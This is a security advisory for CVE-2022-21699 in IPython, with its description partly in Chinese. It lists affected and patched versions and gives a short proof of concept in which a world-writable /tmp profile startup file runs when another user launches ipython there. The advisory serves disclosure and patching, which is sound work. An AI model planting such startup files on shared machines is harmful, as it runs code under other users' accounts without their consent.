Ipython exploit
CVE-2022-21699 Execution with Unnecessary Privileges in ipython
Affected versions
< 5.11
= 6.0.0, < 7.16.3
= 7.17.0, < 7.31.1
= 8.0.0, < 8.0.1
Patched versions
5.11
7.16.3
7.31.1
8.0.1
Description
该漏洞源于 IPython 在 CWD 中执行不受信任的文件。此漏洞允许一个用户以另一个用户的身份运行代码。
Proof of concept
User1:
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py
User2:
cd /tmp
ipython
User2 will see:
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
Patched release and documentation
See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,
Version 8.0.1, 7.31.1 for current Python version are recommended.
Version 7.16.3 has also been published for Python 3.6 users,
Version 5.11 (source only, 5.x branch on github) for older Python versions.
References
- GHSA-pq7m-3gw7-gq5x
- ipython/ipython@46a51ed
- https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699
- https://nvd.nist.gov/vuln/detail/CVE-2022-21699
- https://lists.debian.org/debian-lts-announce/2022/01/msg00021.html
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CRQRTWHYXMLDJ572VGVUZMUPEOTPM3KB/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DZ7LVZBB4D7KVSFNEQUBEHFO3JW6D2ZK/